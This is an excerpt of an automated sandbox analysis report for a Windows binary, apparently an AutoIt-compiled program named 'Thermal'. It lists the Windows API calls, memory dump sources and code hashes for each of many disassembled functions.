                                                • Instruction ID: 195a592a906f3587658c03644e44daff33477804b57effce5b09548b49d1d662
                                                • Opcode Fuzzy Hash: 4aa03f397e6b4d60c4f0e630f04786a20c8010d9d5aa7b9106a650cb08d6ee1d
                                                • Instruction Fuzzy Hash: 925145B5A00209EFCB14CF58C884EAAB7B9FF48314B15856EE959DB301E734E911CFA0
                                                APIs
                                                • _memset.LIBCMT ref: 007D29FF
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007D2A4A
                                                • IsMenu.USER32(00000000), ref: 007D2A6A
                                                • CreatePopupMenu.USER32 ref: 007D2A9E
                                                • GetMenuItemCount.USER32(000000FF), ref: 007D2AFC
                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007D2B2D
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                • String ID:
                                                • API String ID: 3311875123-0
                                                • Opcode ID: 684f57caaca25c02586c606a875be9547f4657ca4a0e4ab81dda02706c3099f2
                                                • Instruction ID: 03a9a3c86763343e53206d159f83420273dab05981b7a6e2cb3c102761373366
                                                • Opcode Fuzzy Hash: 684f57caaca25c02586c606a875be9547f4657ca4a0e4ab81dda02706c3099f2
                                                • Instruction Fuzzy Hash: EC519070600249DBCF25CF68D888BAEBBF4EF64318F14415BE8119B392E7B49947CB51
                                                APIs
                                                  • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                • BeginPaint.USER32(?,?,?,?,?,?), ref: 00771B76
                                                • GetWindowRect.USER32(?,?), ref: 00771BDA
                                                • ScreenToClient.USER32(?,?), ref: 00771BF7
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00771C08
                                                • EndPaint.USER32(?,?), ref: 00771C52
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                • String ID:
                                                • API String ID: 1827037458-0
                                                • Opcode ID: 7f8a86c8c16cc83b253053c3344a7af467fe41c0389617010c8f7955450099b4
                                                • Instruction ID: e90ce0139bb70356ced26a1138882f408d5607f9f538fd5b5af0a363ba9b8fd9
                                                • Opcode Fuzzy Hash: 7f8a86c8c16cc83b253053c3344a7af467fe41c0389617010c8f7955450099b4
                                                • Instruction Fuzzy Hash: E641D7701043049FDB21DF68CC88FB67BE8FB95360F144669FA69872A2C735D805DB61
                                                APIs
                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,007E550C,?,?,00000000,00000001), ref: 007E7796
                                                  • Part of subcall function 007E406C: GetWindowRect.USER32(?,?), ref: 007E407F
                                                • GetDesktopWindow.USER32 ref: 007E77C0
                                                • GetWindowRect.USER32(00000000), ref: 007E77C7
                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 007E77F9
                                                  • Part of subcall function 007D57FF: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5877
                                                • GetCursorPos.USER32(?), ref: 007E7825
                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007E7883
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                • String ID:
                                                • API String ID: 4137160315-0
                                                • Opcode ID: b4ea3bb488fa792ddcca8008f00e67a597d41ed30492d57ebce14fe5e97693b8
                                                • Instruction ID: f6d863f5de0f9353ae632654df5b20a0ffd05f03ed3f5836dcbca7ce2dafe2cf
                                                • Opcode Fuzzy Hash: b4ea3bb488fa792ddcca8008f00e67a597d41ed30492d57ebce14fe5e97693b8
                                                • Instruction Fuzzy Hash: 2731D072509345ABD724DF54CC49F9BB7EAFF88314F00091AF589A7181CB35E908CBA2
                                                APIs
                                                  • Part of subcall function 007C8CC7: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C8CDE
                                                  • Part of subcall function 007C8CC7: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C8CE8
                                                  • Part of subcall function 007C8CC7: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C8CF7
                                                  • Part of subcall function 007C8CC7: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C8CFE
                                                  • Part of subcall function 007C8CC7: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C8D14
                                                • GetLengthSid.ADVAPI32(?,00000000,007C904D), ref: 007C9482
                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 007C948E
                                                • HeapAlloc.KERNEL32(00000000), ref: 007C9495
                                                • CopySid.ADVAPI32(00000000,00000000,?), ref: 007C94AE
                                                • GetProcessHeap.KERNEL32(00000000,00000000,007C904D), ref: 007C94C2
                                                • HeapFree.KERNEL32(00000000), ref: 007C94C9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                • String ID:
                                                • API String ID: 3008561057-0
                                                • Opcode ID: 5612a0702ab23a6bad026991420cdac9b8b62e969d086954d7aa8028bf37e1c8
                                                • Instruction ID: 98551a5dc50a0d2c2469251153e97e1b2598828895ab043686800aaad71b1d74
                                                • Opcode Fuzzy Hash: 5612a0702ab23a6bad026991420cdac9b8b62e969d086954d7aa8028bf37e1c8
                                                • Instruction Fuzzy Hash: BF117C72601A04EFDB989FA4CC0DFAF7BB9FB45316F10815CE94597210D73A9A41CB60
                                                APIs
                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 007C9200
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 007C9207
                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 007C9216
                                                • CloseHandle.KERNEL32(00000004), ref: 007C9221
                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007C9250
                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 007C9264
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                • String ID:
                                                • API String ID: 1413079979-0
                                                • Opcode ID: 83679ed29a8da12412918f2019bec48daf121c058d52d0c06a1c8ef86f020e58
                                                • Instruction ID: 40fa40429c0c83fa7adb81385bdb9f637665f50a28dc5656554a14b595d2ba89
                                                • Opcode Fuzzy Hash: 83679ed29a8da12412918f2019bec48daf121c058d52d0c06a1c8ef86f020e58
                                                • Instruction Fuzzy Hash: BA11477250120EABDB428F94ED4DFDA7BA9FB08705F084018FA44A2160D67A9D60EB60
                                                APIs
                                                • GetDC.USER32(00000000), ref: 007CC34E
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 007CC35F
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007CC366
                                                • ReleaseDC.USER32(00000000,00000000), ref: 007CC36E
                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 007CC385
                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 007CC397
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CapsDevice$Release
                                                • String ID:
                                                • API String ID: 1035833867-0
                                                • Opcode ID: c66b370d6a2fcc1e8f11a10805e5f4177ca00e374eb5264bbec625851e88bdd7
                                                • Instruction ID: 74847ffe22bdffe2fe57299b0f89321bb0649f174872479d8cf3c986bd7d2452
                                                • Opcode Fuzzy Hash: c66b370d6a2fcc1e8f11a10805e5f4177ca00e374eb5264bbec625851e88bdd7
                                                • Instruction Fuzzy Hash: 16014475E00718BBEF509BA59C49F5EBFB8EF58751F004069FA08AB280DA719D10CFA1
                                                APIs
                                                  • Part of subcall function 007716CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00771729
                                                  • Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771738
                                                  • Part of subcall function 007716CF: BeginPath.GDI32(?), ref: 0077174F
                                                  • Part of subcall function 007716CF: SelectObject.GDI32(?,00000000), ref: 00771778
                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 007FC57C
                                                • LineTo.GDI32(00000000,00000003,?), ref: 007FC590
                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007FC59E
                                                • LineTo.GDI32(00000000,00000000,?), ref: 007FC5AE
                                                • EndPath.GDI32(00000000), ref: 007FC5BE
                                                • StrokePath.GDI32(00000000), ref: 007FC5CE
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                • String ID:
                                                • API String ID: 43455801-0
                                                • Opcode ID: 6e6e130aaf6fada8f3144dc450e95f3de2bedff48ae84295fb79fe145dae14f4
                                                • Instruction ID: c4dd12537f8e33327ef34ecece6d883ab7b9a776961c2181bd87884d6c7f210c
                                                • Opcode Fuzzy Hash: 6e6e130aaf6fada8f3144dc450e95f3de2bedff48ae84295fb79fe145dae14f4
                                                • Instruction Fuzzy Hash: E311DB7600410DBFDF129F94DC88FAA7FADFB08354F148461BA185A160D771AE55DFA0
                                                APIs
                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007907EC
                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 007907F4
                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007907FF
                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0079080A
                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00790812
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0079081A
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Virtual
                                                • String ID:
                                                • API String ID: 4278518827-0
                                                • Opcode ID: 187a1eaf741d2541484f5ea4a272ff233b6fa14218ebd992a8ed2ccc4c77ce2e
                                                • Instruction ID: bb64d7764dcb9969b405d931db7b892506f508fbba79cb7a9c71b77e7a0dfde4
                                                • Opcode Fuzzy Hash: 187a1eaf741d2541484f5ea4a272ff233b6fa14218ebd992a8ed2ccc4c77ce2e
                                                • Instruction Fuzzy Hash: D3016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A864CFE5
                                                APIs
                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 007D59B4
                                                • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 007D59CA
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 007D59D9
                                                • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D59E8
                                                • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D59F2
                                                • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 007D59F9
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                • String ID:
                                                • API String ID: 839392675-0
                                                • Opcode ID: 7906c470f90f9834ebd73270715b71abc47ba6f0190c9d26cd013df11eff0750
                                                • Instruction ID: 8cca1c44bc0954c9463effe5e77c7d859c70f214c4c79512ce4e1636cc8b6a3a
                                                • Opcode Fuzzy Hash: 7906c470f90f9834ebd73270715b71abc47ba6f0190c9d26cd013df11eff0750
                                                • Instruction Fuzzy Hash: A0F03032641258BBE7615B929C0DFEF7B7CFFC6B11F00015AFA15D1150DBB11A118AB5
                                                APIs
                                                • InterlockedExchange.KERNEL32(?,?), ref: 007D77FE
                                                • EnterCriticalSection.KERNEL32(?,?,0077C2B6,?,?), ref: 007D780F
                                                • TerminateThread.KERNEL32(00000000,000001F6,?,0077C2B6,?,?), ref: 007D781C
                                                • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0077C2B6,?,?), ref: 007D7829
                                                  • Part of subcall function 007D71F0: CloseHandle.KERNEL32(00000000,?,007D7836,?,0077C2B6,?,?), ref: 007D71FA
                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 007D783C
                                                • LeaveCriticalSection.KERNEL32(?,?,0077C2B6,?,?), ref: 007D7843
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                • String ID:
                                                • API String ID: 3495660284-0
                                                • Opcode ID: d715789f3f98c0a01735db32f6ee3792c6f93ee6c3c5f5819861539c31653bd4
                                                • Instruction ID: 5476ae84883a2dd1592a93d0c049a950f638cd62aebcda84c0a9300ec2875e43
                                                • Opcode Fuzzy Hash: d715789f3f98c0a01735db32f6ee3792c6f93ee6c3c5f5819861539c31653bd4
                                                • Instruction Fuzzy Hash: A0F05832945212AFD7962B64EC8DBAB773AFF49302F151422F202A51B1DBB95801DF60
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007C9555
                                                • UnloadUserProfile.USERENV(?,?), ref: 007C9561
                                                • CloseHandle.KERNEL32(?), ref: 007C956A
                                                • CloseHandle.KERNEL32(?), ref: 007C9572
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 007C957B
                                                • HeapFree.KERNEL32(00000000), ref: 007C9582
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                • String ID:
                                                • API String ID: 146765662-0
                                                • Opcode ID: fc111f7fb4d38e5bc9b6e6f35d05f26caa7d4b800e7d44aeb3ec5943e620658b
                                                • Instruction ID: 1c18c533840e45a4d1678bc5e08cf5ee2995cca8ce08a7efe82ba71e3cbb5aa3
                                                • Opcode Fuzzy Hash: fc111f7fb4d38e5bc9b6e6f35d05f26caa7d4b800e7d44aeb3ec5943e620658b
                                                • Instruction Fuzzy Hash: EEE0E536104101BBDB821FE1EC0CA5ABF39FF49722F104220F21981170CB32A460DF90
                                                APIs
                                                • VariantInit.OLEAUT32(?), ref: 007E8CFD
                                                • CharUpperBuffW.USER32(?,?), ref: 007E8E0C
                                                • VariantClear.OLEAUT32(?), ref: 007E8F84
                                                  • Part of subcall function 007D7B1D: VariantInit.OLEAUT32(00000000), ref: 007D7B5D
                                                  • Part of subcall function 007D7B1D: VariantCopy.OLEAUT32(00000000,?), ref: 007D7B66
                                                  • Part of subcall function 007D7B1D: VariantClear.OLEAUT32(00000000), ref: 007D7B72
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                • API String ID: 4237274167-1221869570
                                                • Opcode ID: b55a5caec94e8e0ce67f7c3e5a246af0699c5aaa042886d72f4d991a33d5373f
                                                • Instruction ID: 17837e38d7c7b29e99e7ea490574ea1593b22796bdacbab3e7e1fefceafb1e5f
                                                • Opcode Fuzzy Hash: b55a5caec94e8e0ce67f7c3e5a246af0699c5aaa042886d72f4d991a33d5373f
                                                • Instruction Fuzzy Hash: 7A919C70604341DFCB50DF25C88495ABBF5EF89354F04896EF89A8B3A2DB35E905CB92
                                                APIs
                                                  • Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D
                                                • _memset.LIBCMT ref: 007D332E
                                                • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D335D
                                                • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 007D3410
                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 007D343E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                • String ID: 0
                                                • API String ID: 4152858687-4108050209
                                                • Opcode ID: f3e6debc06dea333ad3a22036d6ac5b23695f5cc0f627589661313c59dfdb08b
                                                • Instruction ID: 7eec3bb623d783c658b319bd703807979a610ce5aa2e01080a28998a698e7f32
                                                • Opcode Fuzzy Hash: f3e6debc06dea333ad3a22036d6ac5b23695f5cc0f627589661313c59dfdb08b
                                                • Instruction Fuzzy Hash: DF51CF716083419BD725AB28D94567BB7F8AF45320F040A2EF895E3291DB7CDA44CB93
                                                APIs
                                                • _memset.LIBCMT ref: 007D2F67
                                                • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 007D2F83
                                                • DeleteMenu.USER32(?,00000007,00000000), ref: 007D2FC9
                                                • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00837890,00000000), ref: 007D3012
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Menu$Delete$InfoItem_memset
                                                • String ID: 0
                                                • API String ID: 1173514356-4108050209
                                                • Opcode ID: 6cc560d08c91ae11037ead9d25cba6513fbf880cb1dc9b27c8c7496660bfb030
                                                • Instruction ID: 560110a9e3c82988b890104215af3ea2ce8989b882a7ffd778fd1fd826698a15
                                                • Opcode Fuzzy Hash: 6cc560d08c91ae11037ead9d25cba6513fbf880cb1dc9b27c8c7496660bfb030
                                                • Instruction Fuzzy Hash: 01418071208341DFD720DF24C888B5ABBF9AF84310F144A1EF5A5A7392D778EA06CB52
                                                APIs
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 007CB79A: GetClassNameW.USER32(?,?,000000FF), ref: 007CB7BD
                                                • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 007C9ACC
                                                • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 007C9ADF
                                                • SendMessageW.USER32(?,00000189,?,00000000), ref: 007C9B0F
                                                  • Part of subcall function 00781821: _memmove.LIBCMT ref: 0078185B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$_memmove$ClassName
                                                • String ID: ComboBox$ListBox
                                                • API String ID: 365058703-1403004172
                                                • Opcode ID: 24f7d795f10f0f13d2818e76e9d309e50a172b9dfe6833cf912a3ae76bff7a72
                                                • Instruction ID: 3d8222e7b898e7b39d448a323faacdc9df7e92e0089937b178d7b4026c9e320b
